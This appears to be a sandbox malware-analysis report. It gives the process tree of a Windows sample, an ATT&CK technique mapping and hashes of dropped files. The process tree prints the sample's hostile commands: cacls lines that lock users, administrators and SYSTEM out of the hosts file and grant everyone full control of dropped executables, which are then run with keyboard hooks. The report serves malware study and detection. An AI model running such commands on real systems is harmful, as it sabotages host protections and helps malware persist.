C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:6648
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:7072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:6892
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3212
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:81⤵PID:4024
-
C:\Windows\SysWOW64\tyxtye.exeC:\Windows\SysWOW64\tyxtye.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2248
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F1⤵PID:4988
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2168
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F2⤵PID:4964
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F1⤵PID:3100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3316
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F2⤵PID:1476
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe1⤵PID:3524
-
C:\Windows\ime\guwlsyl.exeC:\Windows\ime\guwlsyl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3772
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F1⤵PID:3776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6624
-
-
C:\Windows\system32\cacls.execacls C:\Windows\jetgmbly\guwlsyl.exe /p everyone:F2⤵PID:6716
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\guwlsyl.exe1⤵PID:1996
-
C:\Windows\ime\guwlsyl.exeC:\Windows\ime\guwlsyl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2804
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F1⤵PID:5076
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:6760
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ttltnyvty\ibyaef.exe /p everyone:F2⤵PID:6944
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD54abe190306c2d63cf83c0b4599b23dd2
SHA163e73492b638caf8ec2d37717c801608bab98667
SHA256d4e795706086447a624d8e07d5cbb9be6339661c4dc022c1f1edda9da82307b4
SHA5120e69b600585e9c468d7a49a325aa4421d51bd24913c862398943055d3e1a0ae22178d8dfff366972de81865960ff5ba4a8803b5d6ab122f4b03b3f30e0c0aeeb
-
Filesize
26.5MB
MD5fcafe6c6e0934bcf35314e6389f068e1
SHA1968a8b2d1cacdc93670fc0cdfd622ccf085b23d6
SHA2569adc2a236b75e2a2e364b67c12448de60ff09a5aa1706dc2f0cfced6a785c227
SHA512c1616e90ee7b0bce266bb4c702ca74436a1be06114dd089c0e2c26b240f5efb4197a0ed1d8b91b5c382c82f9e0fd9dcb845ddb9759e3d6d9a4871a6bb1667ed4
-
Filesize
7.7MB
MD52ade88a82f3e8672f1451218f332bc3f
SHA1b3c3197d3745007ee1d10625bd1ec0ae0f794e37
SHA256de2271387408b0a7406b25a20c894295e0c03ed5fc38513b4b34f2f316710513
SHA5128e07f9d460c4a23bd29f13d28754b75a9d531729e2a1148397bf97a19def747f8ad96bfd52e457fcc3d50555efd9dac4223de1a6279aea01f9ab857f1375d298
-
Filesize
3.5MB
MD5b65faef03ea0dbfe9a8783118ec591f9
SHA18ebad6e7b02c833296051a08e81f74a38c9252c6
SHA2569560fb3eea0f81d03db3dc015956f86497b323fac5200858043f7e0cc07f9c01
SHA512ee07ebb1f5b00dc98c09318ac5889fb9964396debb3178df0d56e55634c9686ceaee8cf10d1fa674811e63c5b146cf046180954725515b4b5dcd63c5c944d292
-
Filesize
2.9MB
MD57d194fc66d741eafd7d25a7291756fc7
SHA1584ab88374be2b81a3789664b43d65dd380bf826
SHA25604d79b641379928662754764267421c5ec6f5afe1bd6e725c2b89d19fa1f4d53
SHA512df361f3ee9348d93a9142980dad722f35daed8e58426dea2d77e4e4f9fabd04141997a52b444462ee004319a7aa4398924a9310c8adf8f84813ddcf8b71354f6
-
Filesize
810KB
MD52e88ba5ada12d991ca3d4f6d3b7ece70
SHA16ae17b6ba8a2fbc78dd6edf55f15cee87d0656bc
SHA25625b11c72d998ac56948684c70f7711136b668f8fb14b8ba2f98b2fbb1f3b214f
SHA512b7eaa84d7e4de0798918f739652e6824390946a97ebe94080082c2a50924a6745f83be45b9f23f226c065696244588d5983de85c9bd96c37e7ed689b83504c14
-
Filesize
2.1MB
MD512c881f3f000577cab56b6c77e9b040a
SHA1ae0a8329037c508830a54f77175dc20f5c3d3a1b
SHA2564ece0b5265982b1b67703f7284187dc3d4658e5251db8b6f6de5e08f4d9e63aa
SHA512fd2d2d53e3dc5d0737420fc480e4e0caf78ec90e655da7ffd40884fc991234129cd0a8f1f88db8a3b9e345154c087a18ea40ffdf1e3617178b7dbc95746e586f
-
Filesize
33.7MB
MD5a6b4bed9c55f56245cb77b5bd7c07998
SHA175b6c98e1af72a46b017215ebf5ac23240b47386
SHA2566c12e9d6105ae484167b111761c87aec850916bd4b1a6b79e04be2b5a610351f
SHA512af1531f03e6301fbade25ca7f1592ae8e172ac5823de8502c2234af22835528e92631ae7579dae363d9c09585b195cf5f7dcdbbd39d9cde045729ae84b6a300c
-
Filesize
20.8MB
MD5792d6897b96a118fc8f623ea91cc33cc
SHA1cc97098f72623054d9dce40958a9cf17187b5e3b
SHA25624b957189c3f8c033e2cfdd3063edce697f866fc3a193d2fa9e6e4f4741df441
SHA5128031f7382552612fa9de7d637c12013c14c89a2634632a7ba953555ce776f8f254744a716bbc4092547824805d0f3ab433b8a20ee8775d79b5637bb87a33abb9
-
Filesize
4.2MB
MD50b29e7400b0af97e768462e7218f502f
SHA1df09630dafc727ede4ccd1436eba4f8996a18980
SHA256141b2ec730a2432e1996a9142d42f92990a622592a137b43d1d0139179f6aedc
SHA512c4f479b8544fef27a1ae9002d5dbcc27736a36c5f5c03685393f9a5639ad3878d760c9329762f7a8358ec5555db15bdfd68aab5052b03d806d0f63d79a54a48f
-
Filesize
44.2MB
MD59aaa0de99eedff2d79b9e10634b672fe
SHA100852560fb94bc0c00c7c44a1445748f6b983707
SHA256ebc6ea12050a714ac33d0098c7a86539ea4ede682518ac1d0cab71c5441eb02b
SHA5128f2f3bb9f440f6a8bc9728f31189a457575f4707955d5519cb55d3a9abe1aa1bb89e4c67bde7c776a45877a61f171fbeb550b547fff6cd641f167f6ec83c1839
-
Filesize
2.0MB
MD5d97ed8336797867c5af694e8d4b02cfe
SHA1c262498a74a0d9440b35cf96aa66e64403018e4b
SHA256a02e76b642b70a738d7fdacbe767aa22816c8ac96ef40aadabe83e14264538a4
SHA512456e8960e5c69d2cf4cb0011b318a09f2ef5a89dfedb80d9e616d61bb6c3f2fc64376daed912aaa3b8f2e71f4fb6a461cc37b06e9ce69b7dc9a40f2a371e0958
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
7.8MB
MD5b344a1e143e072f87406f057b3836d50
SHA1bd346dce7badef0473d2922360cd081cd2e19918
SHA2564ae043c56f10402d8ff4636040ff7b1e0d16c4bf08439f32929de0a7c5c73c52
SHA5124e693f52b66e63442e355835564484340e4c4d8c97dcfb19ee8b0f27c51714b5cda5a18a53c3e6affe856dbc7557b72c5049048aabec809b93926afae6babb35
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
195B
MD57f0950f8fd7ee24a893fefa32536dd00
SHA1bd71dc19daaefb4b15946bf0afa229669a52f636
SHA256cead00b1674ef127fdf55199c8357ec81a81e62ed9861e1d9d00a551fb242056
SHA51292aca73f1864601cd4f7a0e3df6d122388a820259b52db0d40cf13111e011b865df47744aa31a32ecc338422e7a83f41c714f4802b32465efed5bf4a53a0317d
-
Filesize
63KB
MD5821ea58e3e9b6539ff0affd40e59f962
SHA1635a301d847f3a2e85f21f7ee12add7692873569
SHA256a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb
SHA5120d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6
-
Filesize
159B
MD53debbef08bdd5bebd599690a410dddb5
SHA1fd60224cb090b6268524644d95c45055cd35604e
SHA2563350f8b4e88719e99b20b5c52c2a0d655e4fddb67fae2ed5b9bd05c794681dc3
SHA512d96376967528a5ac1fceb7b6ea0341f1981ec05efdde005ad72d2ecd9a7b6adfdf4957d44da6255c32043a54b5964ad741549b6d8a44500037d19ad35f69a686
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376